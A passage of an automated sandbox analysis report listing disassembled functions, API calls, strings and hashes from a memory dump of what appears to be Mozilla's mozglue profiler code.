                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C9C582D), ref: 6C9FCC27
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C9C582D), ref: 6C9FCC3D
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CA2FE98,?,?,?,?,?,6C9C582D), ref: 6C9FCC56
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCC6C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCC82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCC98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCCAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C9FCCC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C9FCCDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C9FCCEC
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C9FCCFE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C9FCD14
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C9FCD82
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C9FCD98
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C9FCDAE
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C9FCDC4
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C9FCDDA
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C9FCDF0
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C9FCE06
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C9FCE1C
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C9FCE32
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C9FCE48
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C9FCE5E
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C9FCE74
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C9FCE8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: strcmp
                                                                  • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                  • API String ID: 1004003707-2809817890
                                                                  • Opcode ID: 476374f60e9ee98074c2463cea299f108238adbcf05c2b1f812b3eaf0d8fe21f
                                                                  • Instruction ID: dffd9323e9ce0c861b7b97f53a072ea44588321a2b1469636e3430bfcc0f912d
                                                                  • Opcode Fuzzy Hash: 476374f60e9ee98074c2463cea299f108238adbcf05c2b1f812b3eaf0d8fe21f
                                                                  • Instruction Fuzzy Hash: 845197C1A0523516FB2431155E20BEE5408FF5224EF18983AED29A1E80FA09D68F87F7
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C9C4801
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9C4817
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9C482D
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C484A
                                                                    • Part of subcall function 6C9EAB3F: EnterCriticalSection.KERNEL32(6CA3E370,?,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB49
                                                                    • Part of subcall function 6C9EAB3F: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EAB7C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C485F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C487E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C488B
                                                                  • free.MOZGLUE(?), ref: 6C9C493A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C4956
                                                                  • free.MOZGLUE(00000000), ref: 6C9C4960
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C499A
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  • free.MOZGLUE(?), ref: 6C9C49C6
                                                                  • free.MOZGLUE(?), ref: 6C9C49E9
                                                                    • Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
                                                                    • Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
                                                                    • Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
                                                                  Strings
                                                                  • MOZ_PROFILER_SHUTDOWN, xrefs: 6C9C4A42
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9C47FC
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9C4828
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9C4812
                                                                  • [I %d/%d] profiler_shutdown, xrefs: 6C9C4A06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                  • API String ID: 1340022502-4194431170
                                                                  • Opcode ID: 436d6587f04e6fa962f0cdaa09319857840394db643097a210ced8d3c9eb56fc
                                                                  • Instruction ID: da43830e7f5ba1fb3a99247426f36494e6ee6995a253af0d95ccd7a51273df39
                                                                  • Opcode Fuzzy Hash: 436d6587f04e6fa962f0cdaa09319857840394db643097a210ced8d3c9eb56fc
                                                                  • Instruction Fuzzy Hash: 34812471B002128FDB289F28DCA477A3775AF52318F144269E91AD7B42D730E846CFA7
                                                                  APIs
                                                                    • Part of subcall function 6C9C4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9C44B2,6CA3E21C,6CA3F7F8), ref: 6C9C473E
                                                                    • Part of subcall function 6C9C4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C9C474A
                                                                  • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C9C44BA
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C9C44D2
                                                                  • InitOnceExecuteOnce.KERNEL32(6CA3F80C,6C9BF240,?,?), ref: 6C9C451A
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C9C455C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 6C9C4592
                                                                  • InitializeCriticalSection.KERNEL32(6CA3F770), ref: 6C9C45A2
                                                                  • moz_xmalloc.MOZGLUE(00000008), ref: 6C9C45AA
                                                                  • moz_xmalloc.MOZGLUE(00000018), ref: 6C9C45BB
                                                                  • InitOnceExecuteOnce.KERNEL32(6CA3F818,6C9BF240,?,?), ref: 6C9C4612
                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C9C4636
                                                                  • LoadLibraryW.KERNEL32(user32.dll), ref: 6C9C4644
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C9C466D
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C469F
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C46AB
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C46B2
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C46B9
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C46C0
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9C46CD
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C9C46F1
                                                                  • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C9C46FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                  • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                  • API String ID: 1702738223-3894940629
                                                                  • Opcode ID: c1ff1ed0b2bbaf8dbbaa1d2e358237f2f6cb2d254915e05c5c55a682da405780
                                                                  • Instruction ID: 2aa7731afe59d0d506b33eec83699b9a62a1c1cef0ea08834d5ce1c8e02c10f9
                                                                  • Opcode Fuzzy Hash: c1ff1ed0b2bbaf8dbbaa1d2e358237f2f6cb2d254915e05c5c55a682da405780
                                                                  • Instruction Fuzzy Hash: A361C1B0700355AFEB289F64DC19BA57BB8EB46308F14C59CE908DB641D774C986CFA2
                                                                  APIs
                                                                    • Part of subcall function 6C9F7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C9FB9F1,?), ref: 6C9F7107
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9FDCF5), ref: 6C9FE92D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEA4F
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEA5C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEA80
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEA8A
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9FDCF5), ref: 6C9FEA92
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEB11
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEB1E
                                                                  • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C9FEB3C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEB5B
                                                                    • Part of subcall function 6C9F5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9FEB71), ref: 6C9F57AB
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEBA4
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C9FEBAC
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEBC1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000), ref: 6C9FEBCE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C9FEBE5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8,00000000), ref: 6C9FEC37
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9FEC46
                                                                  • CloseHandle.KERNEL32(?), ref: 6C9FEC55
                                                                  • free.MOZGLUE(00000000), ref: 6C9FEC5C
                                                                  Strings
                                                                  • [I %d/%d] profiler_start, xrefs: 6C9FEBB4
                                                                  • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C9FEA9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                  • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                  • API String ID: 1341148965-1186885292
                                                                  • Opcode ID: dc58c3647a4762ce579804b51b51ade4bdbd6cc4708674ac57e66f90415b7cf8
                                                                  • Instruction ID: 8f13cafc5bc3cb9b4640321f0fb9de185e7e4f6c02be12245ed2eb88c17aa2d2
                                                                  • Opcode Fuzzy Hash: dc58c3647a4762ce579804b51b51ade4bdbd6cc4708674ac57e66f90415b7cf8
                                                                  • Instruction Fuzzy Hash: 74A120316017158FCB289F18DC64BAA77B6EB96308F14812EE96DC7B41DB30D847CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF70E
                                                                  • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C9FF8F9
                                                                    • Part of subcall function 6C9C6390: GetCurrentThreadId.KERNEL32 ref: 6C9C63D0
                                                                    • Part of subcall function 6C9C6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C9C63DF
                                                                    • Part of subcall function 6C9C6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C9C640E
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF93A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF98A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF990
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF994
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF716
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                    • Part of subcall function 6C9BB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C9BB5E0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF739
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF746
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF793
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CA3385B,00000002,?,?,?,?,?), ref: 6C9FF829
                                                                  • free.MOZGLUE(?,?,00000000,?), ref: 6C9FF84C
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C9FF866
                                                                  • free.MOZGLUE(?), ref: 6C9FFA0C
                                                                    • Part of subcall function 6C9C5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C5E8C
                                                                    • Part of subcall function 6C9C5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5E9D
                                                                    • Part of subcall function 6C9C5E60: GetCurrentThreadId.KERNEL32 ref: 6C9C5EAB
                                                                    • Part of subcall function 6C9C5E60: GetCurrentThreadId.KERNEL32 ref: 6C9C5EB8
                                                                    • Part of subcall function 6C9C5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5ECF
                                                                    • Part of subcall function 6C9C5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C9C5F27
                                                                    • Part of subcall function 6C9C5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C9C5F47
                                                                    • Part of subcall function 6C9C5E60: GetCurrentProcess.KERNEL32 ref: 6C9C5F53
                                                                    • Part of subcall function 6C9C5E60: GetCurrentThread.KERNEL32 ref: 6C9C5F5C
                                                                    • Part of subcall function 6C9C5E60: GetCurrentProcess.KERNEL32 ref: 6C9C5F66
                                                                    • Part of subcall function 6C9C5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C9C5F7E
                                                                  • free.MOZGLUE(?), ref: 6C9FF9C5
                                                                  • free.MOZGLUE(?), ref: 6C9FF9DA
                                                                  Strings
                                                                  • Thread , xrefs: 6C9FF789
                                                                  • " attempted to re-register as ", xrefs: 6C9FF858
                                                                  • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C9FF9A6
                                                                  • [D %d/%d] profiler_register_thread(%s), xrefs: 6C9FF71F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                  • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                  • API String ID: 882766088-1834255612
                                                                  • Opcode ID: 65dd08b734a8dcabf12a1dcaad22b33d0585a8c2a1d03f406d153e0be510b518
                                                                  • Instruction ID: 503408b613f8a1d4a6ffb41e332f8f5297d5c0905e95da3804988c1768aa773d
                                                                  • Opcode Fuzzy Hash: 65dd08b734a8dcabf12a1dcaad22b33d0585a8c2a1d03f406d153e0be510b518
                                                                  • Instruction Fuzzy Hash: 678157706047059FDB10DF24C840BAAB7F5FFA5308F05855DE89997B51EB30D84ACBA2
                                                                  APIs
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEE60
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEE6D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEE92
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9FEEA5
                                                                  • CloseHandle.KERNEL32(?), ref: 6C9FEEB4
                                                                  • free.MOZGLUE(00000000), ref: 6C9FEEBB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEEC7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FEECF
                                                                    • Part of subcall function 6C9FDE60: GetCurrentThreadId.KERNEL32 ref: 6C9FDE73
                                                                    • Part of subcall function 6C9FDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C9C4A68), ref: 6C9FDE7B
                                                                    • Part of subcall function 6C9FDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C9C4A68), ref: 6C9FDEB8
                                                                    • Part of subcall function 6C9FDE60: free.MOZGLUE(00000000,?,6C9C4A68), ref: 6C9FDEFE
                                                                    • Part of subcall function 6C9FDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C9FDF38
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEF1E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEF2B
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEF59
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEFB0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEFBD
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEFE1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FEFF8
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF000
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C9FF02F
                                                                    • Part of subcall function 6C9FF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9FF09B
                                                                    • Part of subcall function 6C9FF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C9FF0AC
                                                                    • Part of subcall function 6C9FF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C9FF0BE
                                                                  Strings
                                                                  • [I %d/%d] profiler_stop, xrefs: 6C9FEED7
                                                                  • [I %d/%d] profiler_pause, xrefs: 6C9FF008
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
